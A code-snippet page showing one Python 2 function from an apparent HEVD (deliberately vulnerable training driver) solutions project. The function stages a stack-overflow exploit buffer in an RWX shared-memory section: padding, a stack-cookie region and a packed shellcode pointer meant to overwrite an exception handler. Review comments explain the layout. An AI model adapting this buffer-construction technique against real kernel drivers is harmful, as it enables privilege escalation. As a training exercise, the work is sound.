HEVD_stackoverflowGS.py 文件源码


项目:HEVD-Python-Solutions 作者: GradiusX 项目源码 文件源码
def create_map_file():
    """Stage the input buffer for the HEVD GS stack-overflow exercise in a file mapping.

    HEVD is a deliberately vulnerable training driver; this helper only
    prepares user-mode memory and does not talk to the driver itself.
    It creates a page-sized section named "SharedMemory", maps it into the
    current process, and fills the whole view with a pattern buffer whose
    last 0x214 bytes follow the layout sketched in the comment below.

    Relies on names defined elsewhere in the file: kernel32, win32con,
    struct, ctypes, create_string_buffer, addressof and heap_alloc_payload.

    Returns:
        A 2-tuple (address, length): the address of the last
        SEH_overwrite_offset bytes of the mapped view, and
        SEH_overwrite_offset itself (0x214).
    """
    page_size = 0x1000
    # NOTE(review): the Windows SDK defines FILE_MAP_ALL_ACCESS as 0xF001F
    # (SECTION_ALL_ACCESS). 0x1F is only the five section-specific right bits,
    # so the local name is slightly misleading.
    FILE_MAP_ALL_ACCESS = 0x1F
    # 0x200 + 4 + 12 + 4 == 0x214: the combined size of the last four fields
    # in the layout comment below.
    SEH_overwrite_offset = 0x214

    print "[+] Creating file mapping"
    # A file handle of -1 (INVALID_HANDLE_VALUE) asks for a section backed by
    # the paging file rather than by a file on disk. The section is requested
    # with read/write/execute protection; a named RWX section like this is an
    # artefact that endpoint monitoring can observe.
    # NOTE(review): the return value is not checked; CreateFileMappingA
    # returns NULL on failure.
    shared_memory = kernel32.CreateFileMappingA(-1, None, win32con.PAGE_EXECUTE_READWRITE, 0, page_size, "SharedMemory")

    print "[+] Mapping it to current process space"
    # NOTE(review): MapViewOfFile returns NULL on failure and that is not
    # checked either, so the memmove below would then target address 0.
    # If kernel32 is a plain ctypes handle with the default c_int restype,
    # the address would also be truncated on a 64-bit interpreter; the "<L"
    # pack below suggests a 32-bit target - confirm.
    shared_mapped_memory_address = kernel32.MapViewOfFile( shared_memory , FILE_MAP_ALL_ACCESS, 0, 0, page_size)
    print "[+] Map View of File at address: 0x%X" % shared_mapped_memory_address

    # Address of the final 0x214 bytes of the view: that region ends exactly
    # on the last byte of the mapped page.
    suitable_memory_for_buffer = shared_mapped_memory_address + (page_size - SEH_overwrite_offset)
    print "[+] Suitable Memory for Buffer address: 0x%X" % suitable_memory_for_buffer

    print "[+] Constructing malicious buffer"
    # [-- JUNK FOR PAGE --][-- KERNEL BUFFER SIZE--][-- STACK COOKIE --][-- JUNK --][-- SE/SHELLCODE PTR --]
    # Field sizes: (page_size - 0x214) + 0x200 + 4 + 12 + 4 == page_size, so
    # the buffer fills the view exactly. The last field is the return value of
    # heap_alloc_payload() (defined elsewhere) packed as a 32-bit
    # little-endian integer.
    # NOTE(review): per the layout above, the overrun is meant to reach an
    # exception-handler pointer located past the stack cookie; the fix
    # presumably belongs in the driver's length validation - verify against
    # the driver source.
    malicious_buffer = "A" * (page_size - SEH_overwrite_offset) + "B" * 0x200 + "S" * 4 + "C" * 12 + struct.pack("<L",heap_alloc_payload())
    malicious_buffer_len = len(malicious_buffer)

    print "[+] Copying malicious buffer to file map"
    # Wrap the Python string in a ctypes buffer so that its address can be
    # handed to memmove, then copy all malicious_buffer_len bytes to the
    # start of the mapped view.
    csrc = create_string_buffer(malicious_buffer, malicious_buffer_len)
    ctypes.memmove(shared_mapped_memory_address, addressof(csrc), malicious_buffer_len)
    return suitable_memory_for_buffer, SEH_overwrite_offset